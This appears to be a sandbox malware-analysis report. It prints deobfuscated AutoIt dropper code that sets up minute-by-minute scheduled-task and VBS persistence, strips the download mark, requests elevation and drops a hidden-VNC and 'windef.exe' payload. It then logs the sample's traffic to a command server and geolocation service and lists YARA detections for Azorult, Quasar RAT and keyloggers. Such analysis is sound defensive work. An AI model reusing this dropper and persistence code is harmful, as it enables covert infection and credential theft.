FILEREAD ($OPENFILE ) & BINARY (RANDOM ("0" , "255" ) ) $784529671 = 925089026 DIM $UABHYKAQVWOMMDDZX8BA = 1182834 + 3816393 + 3273855 + 2229667 ENDIF IF $784529671 = 1944260330 THEN LOCAL $VBSPATH = $SOXGWLGCUOVMJM & "\" & $REGKEY & ".vbs" $784529671 = 708304020 CHR (1305842 ) ENDIF ISSTRING ("4KL8aQ6nrUM0CiaoDssoL" ) NEXT IF $MODE THEN SHELLEXECUTE ("schtasks" , "/create /tn " & $REGKEY & " /tr " & CHR ("34" ) & $FULLPATH & CHR ("34" ) & " /sc minute /mo 1 /F" , @SYSTEMDIR , "" , @SW_HIDE ) ELSE GLOBAL $658599975 = 323312849 GLOBAL $FUBZ8NTGJ3 = 394063 FOR $E = 0 TO 3045587 IF $658599975 = 323312849 THEN $URLOPEN = FILEOPEN ($URLPATH , "2" ) RANDOM (521480 ) $658599975 = 967842408 ENDIF IF $658599975 = 648664962 THEN FILEWRITE ($URLOPEN , $URLCONTENT ) EXITLOOP ISSTRING ("cGl8IYf26K" ) ENDIF IF $658599975 = 708304020 THEN FILEWRITE ($VBSOPEN , $VBS ) ISSTRING (686503 + 725473 + 1222023 * 2017236 ) $658599975 = 648664962 ENDIF IF $658599975 = 813318089 THEN LOCAL $TRIPLE = CHR ("34" ) & CHR ("34" ) & CHR ("34" ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $VBSOPEN = FILEOPEN ($VBSPATH , "2" ) ISSTRING ("XSqLLcGAD0roOZkCgtGva6rV9GZGo41qhasCXRiCMUHAW0Qr3aSt6RS0zELfmalI9ahNGRQzleSpy19i0HMom" ) $658599975 = 813318089 CHR (1241107 ) ENDIF IF $658599975 = 1944260330 THEN LOCAL $VBS = "Set WshShell = WScript.CreateObject(" & CHR ("34" ) & "WScript.Shell" & CHR ("34" ) & ") " & @CR & "WshShell.Run " & $TRIPLE & $FULLPATH & $TRIPLE $658599975 = 708304020 RANDOM (1809451 ) ENDIF DIM $VMUSH28BAIEDOOX6WBQR = "eNxuiYfRzyozZXz44zBB1aEWKYKoLLaebRQH679d3" NEXT ENDIF GLOBAL $708304020 = 323312849 GLOBAL $BJQDZ17CCC = 2981910 FOR $E = 0 TO 944417 IF $708304020 = 323312849 THEN LOCAL $HANDLEARRAY = [$URLOPEN , $VBSOPEN , $OPENFILE , $HFILE ] $708304020 = 967842408 INT (835559 ) PTR ("xig276zxHh9uFGxUq" ) ENDIF IF $708304020 = 813318089 THEN FILESETATTRIB ($FULLPATH , $ATTRIB ) RANDOM (3384109 ) $708304020 = 1944260330 ISBINARY ("nO1cOmUhQrUffFL0RveYfn6CJFOzsL4ECKTVGEBWJx" ) RANDOM (709510 ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($HFILE , $BINARY ) $708304020 = 813318089 ENDIF IF $708304020 = 1944260330 THEN FILESETATTRIB ($SOXGWLGCUOVMJM , $ATTRIB ) INT (3974479 ) EXITLOOP ISSTRING ("tZewpMDX0tl3roRwZCybbdsGd63tTcicsnpIWTUHaZFQ28qvJM34ehGqFGttTjdYkj" ) ENDIF RANDOM (506822 ) NEXT FOR $I = "0" TO UBOUND ($HANDLEARRAY ) - "1" FILECLOSE ($HANDLEARRAY [$I ] ) NEXT ENDFUNC FUNC GETDIR ($INDEX ) GLOBAL $813318089 = 323312849 GLOBAL $GT0ALHLOEO = 2332845 FOR $E = 0 TO 2173231 DIM $7KR9DPYZZ0VSFTXMXBCW = 745899 + 456920 + 2887456 IF $813318089 = 323312849 THEN LOCAL $DIRS = [@TEMPDIR , @APPDATADIR , @SCRIPTDIR ] MOD (2599250 , 760383 ) $813318089 = 967842408 DIM $V8ETRSBKZZF5RBJREWCT = 250402 + 4293885267 + 1539338 + 3085217 ENDIF IF $813318089 = 967842408 THEN RETURN $DIRS [$INDEX - "1" ] PTR ("G81yxSf2m643X6Hlbh3q3Bv9S56GGxTLWFySKV4vrkGhCxvBLJKt5WReM2RBWHuYmrgrGZ" ) EXITLOOP MOD (2162431 , 3953781 ) ENDIF MOD (2105889 , 1303155 ) NEXT ENDFUNC FUNC REMOVEZONEID () FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) ENDFUNC REMOVEZONEID () KHOCWHDEQXMSTFPOADRL ("runas" ) LOCAL $GBCNYUEOGFONFLBWF = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("AppXDeploymentExtensions.desktop1" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF &= DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("Eap3Host2" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF = DBRUAIEIBZEWRGBQ ($GBCNYUEOGFONFLBWF , "sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub" ) ASAZRREHKGLB () AJJMOCPPKFEWODWKA () $SOXGWLGCUOVMJM = @USERPROFILEDIR & "\btpanui" KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("fmweecwytels" , "vnc.exe" , TRUE , FALSE , 1 ) KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("qhdokzqjbkdd" , "windef.exe" , TRUE , FALSE , 1 ) $KNHRXQUZAIDARCYAAKVJDJTPD = @SCRIPTFULLPATH MWMQWLZFSVGLEKEBWPKTQCNGY ($KNHRXQUZAIDARCYAAKVJDJTPD , "" , $GBCNYUEOGFONFLBWF , FALSE ) MIVVMSGJPNONEWUB ("SystemPropertiesPerformance.exe" , "RtkAudioService64" , "+HR" , TRUE ) WHILE TRUE TLRQDAKNGKXFDWQNVSPQPWUUICTCP () WEND LLBUPLMSHANIDLHCMEMP ()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 01:36:07.384537935 CEST	49743	8000	192.168.2.4	50.17.5.224
Sep 29, 2021 01:36:07.987818956 CEST	8000	49743	50.17.5.224	192.168.2.4
Sep 29, 2021 01:36:07.987917900 CEST	49743	8000	192.168.2.4	50.17.5.224
Sep 29, 2021 01:36:07.988516092 CEST	49743	8000	192.168.2.4	50.17.5.224
Sep 29, 2021 01:36:08.991806030 CEST	8000	49743	50.17.5.224	192.168.2.4
Sep 29, 2021 01:36:09.985110998 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:10.010328054 CEST	80	49744	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:10.010624886 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:10.011471987 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:10.037458897 CEST	80	49744	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:10.079448938 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:14.900573015 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:18.400753975 CEST	49745	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:20.030541897 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:20.056447983 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:20.056561947 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:20.062109947 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:20.087898016 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:20.158437967 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:21.471038103 CEST	49745	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:22.907526016 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:22.907576084 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:36:22.907756090 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:27.471576929 CEST	49745	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:44.489223957 CEST	49750	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:47.662820101 CEST	49750	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:48.004627943 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:48.004652977 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:36:53.770750046 CEST	49750	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:04.783417940 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:37:04.783525944 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:37:10.835088968 CEST	49751	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:13.006927967 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:13.006956100 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:37:13.897594929 CEST	49751	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:18.747024059 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:37:19.898145914 CEST	49751	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:37.024944067 CEST	49752	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:38.009067059 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:38.009095907 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:37:40.165508032 CEST	49752	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:46.166199923 CEST	49752	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:03.105066061 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:03.105103016 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:38:03.183374882 CEST	49753	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:06.214675903 CEST	49753	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:12.215255022 CEST	49753	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:13.171844006 CEST	49754	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:16.168715954 CEST	49754	8080	192.168.2.4	5.8.88.191

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 01:35:49.361951113 CEST	54531	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:35:49.380501032 CEST	53	54531	8.8.8.8	192.168.2.4
Sep 29, 2021 01:35:55.125516891 CEST	58028	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:35:55.143276930 CEST	53	58028	8.8.8.8	192.168.2.4
Sep 29, 2021 01:35:55.282685995 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:35:55.311024904 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:07.160135031 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:07.359210014 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:09.943180084 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:09.955970049 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:19.977479935 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:19.990183115 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:40.032248020 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:40.061148882 CEST	53	55854	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 29, 2021 01:36:07.160135031 CEST	192.168.2.4	8.8.8.8	0x4ffa	Standard query (0)	0x21.in	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:09.943180084 CEST	192.168.2.4	8.8.8.8	0xdbd4	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:19.977479935 CEST	192.168.2.4	8.8.8.8	0x2afc	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 29, 2021 01:36:07.359210014 CEST	8.8.8.8	192.168.2.4	0x4ffa	No error (0)	0x21.in	50.17.5.224	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:09.955970049 CEST	8.8.8.8	192.168.2.4	0xdbd4	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:19.990183115 CEST	8.8.8.8	192.168.2.4	0x2afc	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

0x21.in:8000

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49743	50.17.5.224	8000	C:\Users\user\Desktop\CVbJSUXraQ.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 01:36:07.988516092 CEST	942	OUT	POST /_az/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: 0x21.in:8000 Content-Length: 101 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49744	208.95.112.1	80	C:\Users\user\AppData\Local\Temp\windef.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 01:36:10.011471987 CEST	942	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Sep 29, 2021 01:36:10.037458897 CEST	943	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 23:36:09 GMT Content-Type: application/json; charset=utf-8 Content-Length: 278 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 30 35 22 2c 22 6c 61 74 22 3a 34 37 2e 33 38 37 38 2c 22 6c 6f 6e 22 3a 38 2e 35 32 30 32 39 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 6f 72 67 22 3a 22 73 65 72 76 65 72 50 6f 6f 6c 32 22 2c 22 61 73 22 3a 22 41 53 35 31 33 39 35 20 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 71 75 65 72 79 22 3a 22 31 38 35 2e 33 32 2e 32 32 32 2e 31 35 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49746	208.95.112.1	80	C:\Users\user\AppData\Local\Temp\windef.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 01:36:20.062109947 CEST	944	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Sep 29, 2021 01:36:20.087898016 CEST	944	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 23:36:20 GMT Content-Type: application/json; charset=utf-8 Content-Length: 278 Access-Control-Allow-Origin: * X-Ttl: 49 X-Rl: 42 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 30 35 22 2c 22 6c 61 74 22 3a 34 37 2e 33 38 37 38 2c 22 6c 6f 6e 22 3a 38 2e 35 32 30 32 39 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 6f 72 67 22 3a 22 73 65 72 76 65 72 50 6f 6f 6c 32 22 2c 22 61 73 22 3a 22 41 53 35 31 33 39 35 20 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 71 75 65 72 79 22 3a 22 31 38 35 2e 33 32 2e 32 32 32 2e 31 35 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: CVbJSUXraQ.exe PID: 7128 Parent PID: 1380

General

Start time:	01:35:55
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\CVbJSUXraQ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Imagebase:	0xdb0000
File size:	2111264 bytes
MD5 hash:	B0B78DA613422BE0DE8DE2E2A2D0CE68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: vnc.exe PID: 6296 Parent PID: 7128

General

Start time:	01:36:03
Start date:	29/09/2021
Path:	C:\Users\user\AppData\Local\Temp\vnc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\vnc.exe'
Imagebase:	0xab0000
File size:	415232 bytes
MD5 hash:	B8BA87EE4C3FC085A2FED0D839AADCE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, Virustotal, Browse Detection: 93%, ReversingLabs
Reputation:	moderate

Analysis Process: svchost.exe PID: 5200 Parent PID: 6296

General

Start time:	01:36:04
Start date:	29/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
